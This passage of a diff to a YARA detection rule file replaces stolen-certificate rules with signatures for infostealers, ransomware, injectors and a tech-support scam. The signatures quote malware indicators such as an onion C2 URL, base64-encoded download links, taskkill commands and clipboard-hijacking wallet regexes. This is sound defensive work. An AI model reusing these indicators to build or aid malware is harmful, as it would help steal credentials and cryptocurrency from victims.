+		$s3 = "<blocknum>%d</blocknum>" fullword ascii
+		$s4 = "%s\\%s-%s-%d%s" fullword ascii
+		$s5 = ">RAC=OQD:S>P@:AO?R:EEOS:ARDD=N?EENSB" ascii wide
+		$m1 = "<title>LOCKFILE</title>" ascii wide nocase
+		$m2 = "<hta:application id=LOCKFILE applicationName=LOCKFILE" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MISTO EKONOMSKE STORITVE, d.o.o." and pe.signatures [ i ] . serial == "00:92:bc:05:1f:18:11:bb:0b:86:72:7c:36:39:4f:78:49" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 1 of ( $m* ) ) ) or ( 1 of ( $m* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_B4F42E2C153C904Fda64C957Ed7E1028 : FILE
+rule DITEKSHEN_MALWARE_Win_HUNT_Foggyweb : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Attempt on hunting FoggyWeb"
 		author = "ditekSHen"
-		id = "d284b7f0-9728-5755-87d5-f8251903e778"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "429827f7-2ccf-5c13-ac0d-1fd8b35a6740"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2796-L2807"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8016-L8032"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d47f85602234eae7629b778b09ed5c3656c6afa8b6a7ba42cc46f451202a16c0"
-		score = 75
+		logic_hash = "d868501bc52ad7787d9e99927dd61e9ad9e2132f02348fc71e64666bfc0c9e15"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ed4c50ab4f173cf46386a73226fa4dac9cadc1c4"
-		importance = 20
+
+	strings:
+		$u1 = "/adfs/portal/images/theme/light01/" ascii wide
+		$u2 = "/adfs/services/trust/2005/samlmixed/upload" ascii wide
+		$s1 = "ProcessGetRequest" ascii wide
+		$s2 = "ProcessPostRequest" ascii wide
+		$s3 = "UrlGetFileNames" ascii wide
+		$s4 = "GetWebpImage" ascii wide
+		$s5 = "GetWebpHeader" ascii wide
+		$s6 = "ExecuteAssemblyRoutine" ascii wide
+		$s7 = "ExecuteBinary" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NONO spol. s r.o." and pe.signatures [ i ] . serial == "b4:f4:2e:2c:15:3c:90:4f:da:64:c9:57:ed:7e:10:28" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ac307E5257Bb814B818D3633B630326F : FILE
+rule DITEKSHEN_MALWARE_Win_HUNT_Apostle
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Attempt on hunting new variants of Apostle"
 		author = "ditekSHen"
-		id = "b6d6c195-cd02-5ecd-82f3-348ab6f26eb5"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "31d15111-6935-5a77-ae9a-6bee16c1d2f6"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2809-L2820"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8034-L8043"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f187d3084eb189cdd0e858aed1d9589d586f369b128679c6c1dec860e544f326"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		thumbprint = "4d6a089ec4edcac438717c1d64a8be4ef925a9c6"
-		importance = 20
+		logic_hash = "9acab5dadee0760431376075450f54bbb32ebed10dc928db91a44d069afc1576"
+		score = 50
+		quality = 73
+		tags = ""
+
+	strings:
+		$x1 = "://t.me/x4ran" ascii wide nocase
+		$x2 = "43JuFUyzfcKQwTzCTHpQoA8uLGtbwFBLyeeXoYEEU5dZLhLT1cZJDk4cytjcgQT7kdjSerJqpEp2gUcH91bjLcoq2bqik3j" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aqua Direct s.r.o." and pe.signatures [ i ] . serial == "00:ac:30:7e:52:57:bb:81:4b:81:8d:36:33:b6:30:32:6f" )
+		any of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_063A7D09107Eddd8Aa1F733634C6591B : FILE
+rule DITEKSHEN_MALWARE_Win_HUNT_Ghostemperor_Remotecontrolpayload : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Attempt on hunting GhostEmperor Stage 4 Remote Control Payload"
 		author = "ditekSHen"
-		id = "489daa61-8409-500d-bc46-a42a444fcdc0"
-		date = "2020-11-19"
-		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2822-L2833"
+		id = "d30a2aad-8bd6-5291-a31d-7dade250e57e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
+		reference = "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/30094337/GhostEmperor_technical-details_PDF_eng.pdf"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8045-L8052"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8b6c1935d51207e6b9919c85d369dcc6963f52ee4d21758d18e2c57115e9051b"
-		score = 75
+		logic_hash = "dabce4e0add0d05b4efd8e7540e4f14767c7b5fab361bd731234dd9dd844c658"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a03f9b3f3eb30ac511463b24f2e59e89ee4c6d4a"
-		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Line Logistics" and pe.signatures [ i ] . serial == "06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 2 and pe.exports ( "1" ) and pe.exports ( "__acrt_iob_func" )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4C687A0022C36F89E253F91D1F6954E2 : FILE
+rule DITEKSHEN_MALWARE_Win_Unicorn : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Unicorn infostealer"
 		author = "ditekSHen"
-		id = "d4b03832-60f2-5342-8186-3e6c3d7eeb63"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7cc8298d-abbd-5dda-bbd4-8b061095c367"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2835-L2846"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8077-L8107"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0bcbe8c85f02735378b5be95c098ca5088f451e390ec6ce76fb732f0db297c1f"
+		logic_hash = "c4150b213c0dd88c87eb81e3ad455d8f658a57b0998bc6e394c5afac9423d9f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4412007ae212d12cea36ed56985bd762bd9fb54a"
-		importance = 20
+
+	strings:
+		$x1 = "WinHTTP Downloader/1.0" fullword wide
+		$x2 = "[CTRL + %c]" fullword wide
+		$x3 = "\\UnicornLog.txt" fullword wide
+		$x4 = "/*INITIALIZED*/" fullword wide
+		$s1 = { 2f 00 63 00 20 00 22 00 43 00 4f 00 50 00 59 00
+               20 00 2f 00 59 00 20 00 2f 00 42 00 20 00 22 00
+               25 00 73 00 22 00 20 00 22 00 25 00 73 00 22 00
+               22 00 00 00 63 00 6d 00 64 00 2e 00 65 00 78 00
+               65 }
+		$s2 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 33 00 32 00
+               2e 00 65 00 78 00 65 00 00 00 00 00 25 00 73 00
+               20 00 22 00 25 00 73 00 22 00 2c 00 25 00 68 00
+               73 }
+		$s3 = "%*[^]]%c%n" fullword ascii
+		$s4 = "file://%s%s%s" fullword ascii
+		$s5 = "%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+		$s6 = "regex_start_injects" fullword ascii
+		$s7 = "DLEXEC" fullword ascii
+		$s8 = "^((((3|1)[A-Za-z0-9]{33}))(\\s|$)|(bc1q)[A-Za-z0-9]{38}(\\s|$))" fullword ascii
+		$s9 = "^(0x)?[A-Za-z0-9]{40}(\\s|$)" fullword ascii
+		$s10 = "clipRegex" fullword ascii
+		$s11 = "%s?k=%s&src=clip&id=%s" fullword ascii
+		$s12 = "http://izuw6rclbgl2lwsh.onion/o.php" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HETCO ApS" and pe.signatures [ i ] . serial == "4c:68:7a:00:22:c3:6f:89:e2:53:f9:1d:1f:69:54:e2" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 8 of ( $s* ) or ( 3 of ( $x* ) and 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3Cee26C125B8C188F316C3Fa78D9C2F1 : FILE
+rule DITEKSHEN_MALWARE_Win_Spectre : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Spectre infostealer"
 		author = "ditekSHen"
-		id = "d9271a74-1a04-5863-afc6-4b1d2982f680"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "43b32900-8dff-5a95-bcff-d6bd17703476"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2848-L2859"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8109-L8124"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "673a275a6d899b5de66d80cb55fa6438c2e14c70a96ba8461eb4946e1f4b4dfa"
+		logic_hash = "ee041928ab5010fd5a06538f9a7cf9c72e44903fdb05f13b12362af0b326fd6f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9efcf68a289d9186ec17e334205cb644c2b6a147"
-		importance = 20
+		snort_sid = "920233-920234"
+
+	strings:
+		$s1 = "\\../../../json.h" wide
+		$s2 = "static_cast<std::size_t>(index) < kCachedPowers.size()" fullword wide
+		$s3 = " cmd.exe" fullword wide
+		$s4 = "m_it.object_iterator != m_object->m_value.object->end()" fullword wide
+		$h1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" fullword wide
+		$h2 = "----974767299852498929531610575" ascii wide
+		$h3 = "Content-Disposition: form-data; name=\"file\"; filename=\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bitubit LLC" and pe.signatures [ i ] . serial == "3c:ee:26:c1:25:b8:c1:88:f3:16:c3:fa:78:d9:c2:f1" )
+		( uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $h* ) ) or ( all of ( $h* ) and 2 of ( $s* ) ) ) ) or ( 6 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A0A27Aefd067Ac62Ce0247B72Bf33De3 : FILE
+rule DITEKSHEN_MALWARE_Win_HUNT_Blackbyte : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Attempt on hunting BlackByte ransomware"
 		author = "ditekSHen"
-		id = "1e8db3c4-8d32-5a8d-96ac-785d8f703c7d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c07e9b83-3bbf-52c9-b9fa-ca03f285a906"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2861-L2872"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8126-L8139"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c49e1d8b1a2d0e27fd25574ce587f60770ecac75c1db437bf7538d2ff47c8d4c"
-		score = 75
-		quality = 75
+		logic_hash = "4ceb71e42b888522c183af7e180bae47510fc7aa60a713aa83ffc2c98c03466f"
+		score = 50
+		quality = 57
 		tags = "FILE"
-		thumbprint = "42c2842fa674fdca14c9786aaec0c3078a4f1755"
-		importance = 20
+
+	strings:
+		$s1 = "WalkDirAndEncrypt" ascii wide nocase
+		$s2 = "FileEncrypt" ascii wide nocase
+		$s3 = "BlackByte." ascii wide nocase
+		$s4 = "EnumerateDirAndEncrypt" ascii wide nocase
+		$s5 = "Dismount-DiskImage" ascii wide nocase
+		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cfbcdabfdbdccaaccadfeaacacf" and pe.signatures [ i ] . serial == "a0:a2:7a:ef:d0:67:ac:62:ce:02:47:b7:2b:f3:3d:e3" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Eee8Cf0A0E4C78Faa03D07470161A90E : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector05 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader / injector (NiceProcess)"
 		author = "ditekSHen"
-		id = "a91c84db-99b4-5e24-ba8a-4e009219eb05"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "857eb13b-a882-5326-b7aa-4d2fcd0b6425"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2874-L2885"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8141-L8158"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c14eeeab8cf9797499d23f451a695b443ecc8d3ebbc2edb830ae450e444178c"
+		logic_hash = "5345c2b03e14b7324a13bac0da783eec8c30da18043c1b2d46162e5b511fae63"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "32eda5261359e76a4e66da1ba82db7b7a48295d2"
-		importance = 20
+
+	strings:
+		$s1 = "pidhtmpfile.tmp" fullword ascii
+		$s2 = "pidhtmpdata.tmp" fullword ascii
+		$s3 = "pidHTSIG" fullword ascii
+		$s4 = "Taskmgr.exe" fullword ascii
+		$s5 = "[HP][" ascii
+		$s6 = "[PP][" ascii
+		$s7 = { 70 69 64 68 74 6d 70 66 69 6c 65 2e 74 6d 70 00
+                2e 64 6c 6c 00 00 00 00 70 69 64 48 54 53 49 47
+                00 00 00 00 ?? ?? 00 00 54 61 73 6b 6d 67 72 2e
+                65 78 65 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aafabffdbdbcbfcaebdf" and pe.signatures [ i ] . serial == "ee:e8:cf:0a:0e:4c:78:fa:a0:3d:07:47:01:61:a9:0e" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_79E1Cc0F6722E1A2C4647C21023Ca4Ee : FILE
+rule DITEKSHEN_MALWARE_Win_Kutaki : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Kutaki"
 		author = "ditekSHen"
-		id = "0abbd882-0224-5c94-98b2-870853344883"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d91812bb-4564-56b5-9757-81255b5233fb"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2887-L2898"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8160-L8173"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9d0c02ae3eab7f7c28dba04cd08fdddef2be64a1622d7fb519a4bf3a40ef19b1"
+		logic_hash = "24fbc9ca6de421275813c285a8fca91cfcede48f4b4de9feda010c644f0c251f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "41d2f4f810a6edf42b3717cf01d4975476f63cba"
-		importance = 20
+
+	strings:
+		$x1 = "AASEaHR0cDovL29qb3JvYmlhLmNsdWIvbGFwdG9wL2xhcHRvcC5waHA" ascii
+		$x2 = "aHR0cDovL3RlcmViaW5uYWhpY2MuY2x1Yi9zZWMva29vbC50eHQ" ascii
+		$s1 = "wewqeuuiwe[XXXXXXX]" ascii
+		$s2 = "alt|aHR0cD" ascii
+		$s3 = "<rdf:Description about='uuid:fb761dc9-9daf-11d9-9a32-fcf1da45dca2'" ascii
+		$s4 = "<rdf:Description about='uuid:0ab54f47-96d6-11d9-a59c-cbc93330e07e'" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPAGETTI LTD" and pe.signatures [ i ] . serial == "79:e1:cc:0f:67:22:e1:a2:c4:64:7c:21:02:3c:a4:ee" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( all of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6D688Ecf46286Fe4B6823B91384Eca86 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector06 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader / injector"
 		author = "ditekSHen"
-		id = "4718996b-cb42-5b83-8fdf-d87751302a00"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "9d8164ee-49b3-5eb1-bd1d-9437fc6f1392"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2900-L2911"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8175-L8189"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "33296b5b9156af6d95bec9981a9fab3137bcd17bfb26ea2d212ae004275bf42e"
+		logic_hash = "e44ea8dbb94c6cd3b63d66eac3e9b3d6d5ff7d561410b8328e6c24630645305b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "970205140b48d684d0dc737c0fe127460ccfac4f"
-		importance = 20
+
+	strings:
+		$s1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" ascii wide
+		$s2 = "Content-Type: application/x-www-form-urlencoded" wide
+		$s3 = "https://ipinfo.io/" wide
+		$s4 = "https://db-ip.com/" wide
+		$s5 = "https://www.maxmind.com/en/locate-my-ip-address" wide
+		$s6 = "https://ipgeolocation.io/" wide
+		$s7 = "POST" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AtomPark Software JSC" and pe.signatures [ i ] . serial == "6d:68:8e:cf:46:28:6f:e4:b6:82:3b:91:38:4e:ca:86" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_9Aa99F1B75A463460D38C4539Fae4F73 : FILE
+rule DITEKSHEN_MALWARE_Win_Crown : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Crown Tech Support Scam"
 		author = "ditekSHen"
-		id = "5ffad411-49e2-5691-95e7-1e294a2a101e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ac4551d0-a574-5287-9b37-899c736db792"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2913-L2924"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8191-L8211"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b73c6ca2c0cd0e09f0add77c3af3c8e16f46cec29b49d4dcab5a569fed8d3d39"
+		logic_hash = "eeb36993c93d76ed118643ee417f15e1768015f72464dbabca7ae001f64a0aef"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b2ea9e771631f95a927c29b044284ef4f84a2069"
-		importance = 20
+		snort_sid = "920251-920261"
+
+	strings:
+		$d1 = "//prodownload.live" ascii
+		$c1 = "&uid=" ascii
+		$c2 = "&ver=" ascii
+		$c3 = "&mcid=" ascii
+		$c4 = ".php?uid=" ascii
+		$c5 = ".php?ip=" ascii
+		$s1 = "Operating System Support ID:" ascii
+		$s2 = "taskkill /IM explorer.exe -f" ascii nocase
+		$s3 = "/C taskkill /IM Taskmgr.exe -f" ascii nocase
+		$s4 = "FastSuport" fullword ascii
+		$s5 = "Support Override!" fullword wide
+		$s6 = "Support Assistance Override Activated!" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beaacdfaeeccbbedadcb" and pe.signatures [ i ] . serial == "9a:a9:9f:1b:75:a4:63:46:0d:38:c4:53:9f:ae:4f:73" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $c* ) or 4 of ( $s* ) or ( 1 of ( $d* ) and ( 3 of ( $c* ) or 2 of ( $s* ) ) ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_E414655F025399Cca4D7225D89689A04 : FILE
+rule DITEKSHEN_MALWARE_Win_Floodfix : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects FloodFix"
 		author = "ditekSHen"
-		id = "2df4eb66-4890-540f-95e1-fb69eeb32df2"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b05b0b40-0de8-58a0-889e-44a12d346de4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2926-L2937"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8213-L8219"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "589ad4939d235138791a98f5d43f6a786ad14345c995ad2e073d3673fb41365a"
+		logic_hash = "d7da820b00ef5ee2e943b012cfa57421a39f8a7bfc627cc1909151a47092a26d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "98643cef3dc22d0cc730be710c5a30ae25d226c1"
-		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAF\\x94\\xE5\\x90\\xBE\\xE8\\xBF\\xAA\\xE5\\x90\\xBE\\xE8\\xBF\\xAA\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE8\\xBF\\xAA\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE6\\x8F\\x90\\xE4\\xBC\\x8A\\xE6\\xAF\\x94\\xE6\\x8F\\x90\\xE8\\xBF\\xAA\\xE8\\xBF\\xAA\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE6\\x8F\\x90\\xE7\\xBB\\xB4\\xE6\\xAF\\x94" and pe.signatures [ i ] . serial == "e4:14:65:5f:02:53:99:cc:a4:d7:22:5d:89:68:9a:04" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( pe.exports ( "FloodFix" ) or pe.exports ( "FloodFix2" ) ) and pe.exports ( "crc32" )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_64F82Ed8A90F92A940Be2Bb90Fbf6F48 : FILE
+rule DITEKSHEN_MALWARE_Win_UNK_Infostealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown information stealer"
 		author = "ditekSHen"
-		id = "70469507-30f1-56be-90bb-1055f7df2496"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f6f9816f-79bd-527c-9c0f-24e09c95ae35"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2939-L2950"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8221-L8246"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eacb9d8834bdf618b5aa44bfb37b0b6413f9b4595b6261a948566a63e9855162"
+		logic_hash = "ca57ebf4b56020d278ec8a7e721c72de7a1f925a8e7f1f3a9edc8a70b88ff9d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4d00f5112caf80615852ffe1f4ee72277ed781c3"
-		importance = 20
+		snort_sid = "920263"
+		hash1 = "b7a2cb34d3bc42d6d4c9d9af7dd406e2a5caef8ea46e5d09773feeb9920a6b21"
+		hash2 = "dd95377842932d77e225b126749e1e6e8ecd6f5c6540d084a551a80a54d02d7d"
+		hash3 = "12f790d9a0775b5e62effc6ea9e55bbef345fffbfb2f671f85098c4f7661dd0f"
+		hash4 = "0a4cea763dffde451c75a434143fc5d014c32c6d1f8f34920ea5f2854e62118f"
+
+	strings:
+		$s1 = "%s\\%s\\%s-Qt" fullword wide
+		$s2 = "%s\\%s.json" fullword wide
+		$s3 = "*.mmd*" fullword wide
+		$s4 = "%s\\%s.vdf" fullword wide
+		$s5 = "%-50s %s" fullword wide
+		$s6 = "dISCORD|lOCAL" fullword ascii nocase
+		$s7 = "sTORAGE|LEVELDB" fullword ascii nocase
+		$s8 = ".coin" fullword ascii
+		$s9 = ".emc" fullword ascii
+		$s10 = ".lib" fullword ascii
+		$s11 = ".bazar" fullword ascii
+		$s12 = "id=%d" fullword ascii
+		$s13 = "2:?/v /v /v /^Y" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Klimate Vision Plus" and pe.signatures [ i ] . serial == "64:f8:2e:d8:a9:0f:92:a9:40:be:2b:b9:0f:bf:6f:48" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F0031491B673Ecdf533D4Ebe4B54697F : FILE
+rule DITEKSHEN_MALWARE_Win_DECAF : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DECAF ransomware"
 		author = "ditekSHen"
